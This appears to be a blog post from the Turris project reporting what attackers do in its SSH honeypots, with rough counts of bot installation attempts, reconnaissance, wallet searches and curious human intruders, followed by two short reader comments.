Who’s poking at our Turris SSH honeypot

The Turris SSH honeypots are definitely not idle. There are currently 168 active honeypots that daily record 1000 to 2000 and on some days even up to 5000 SSH sessions containing at least one command.

Login is allowed for the usernames “root” and “admin” (any password is accepted). I wrote a simple script that classifies the most common behaviors, computes statistics and prints out unfamiliar sessions. A typical sample of 1000 SSH sessions looks like this:

  •  77 Mayday.f DDoS bot – installation attempt
  • 17 Ganiw DDoS bot – installation attempt
  • 727 statistics gathering (uname, ifconfig, memory size, etc.)
  • 66 attempts to exfiltrate the data stored by a bot
  • 7 WinSCP
  • 2 shell bot dropper (downloads other malware)

The rest are relatively unique sequences of commands, and sometimes even real people fall for the honeypot trap. It is clear also from the speed of the commands being thrown into the system – a script dumps them all at once, while a human takes their time. Human attackers mostly install Trojans or IRC bots. In some cases, the code is so old that it uses the Altavista search. For some reason, it prefers Altavista US, IT and DE.

Bots and Trojans sometimes try obfuscate themselves a little by changing their names or having a name of something harmless, like bash or crond.

Statistics gathering may indicate that the attacker is looking for a suitable machine (e. g. it wants to weed out SOHO routers) or trying to discern the honeypot. The code of the attacker’s script is not available to us, so we cannot know for sure.

Another category consists of financially motivated attackers searching for various cryptocurrency wallets.

Curiosities

In addition to a guy trying to install a 15-year-old IRC bot, there are other weird individuals. One of them, for example, wanted to install a streaming audio server (ShoutCast).

A few others tried to install Steam and launch a CounterStrike server. Another one unsuccessfully looked for some games installed.

A “script kiddie” who we’ve seen recently tried to install a compiler with development versions of libraries and compile a god-knows-what. Finally, he gave up; he tried desperately to log out with commands exit, exit, exit, quit, logout and he saw he still couldn’t (it’s a bit weird little feature of the honeypot that it won’t let you log out – nobody seems to ultimately fall for it, but it’s fun to watch them struggle for a while :-)).

Author:

Comments (2)

  1. lobo says:

    lol 🙂

  2. leo says:

    Hi,

    great feature! Would it be possible to extend the list of allowed usernames so that more attacks are trapped in the honeypot? Some ideas: “user”, “ubnt”, “Administrator” or “supervisor”.

    Kind regards

Leave a comment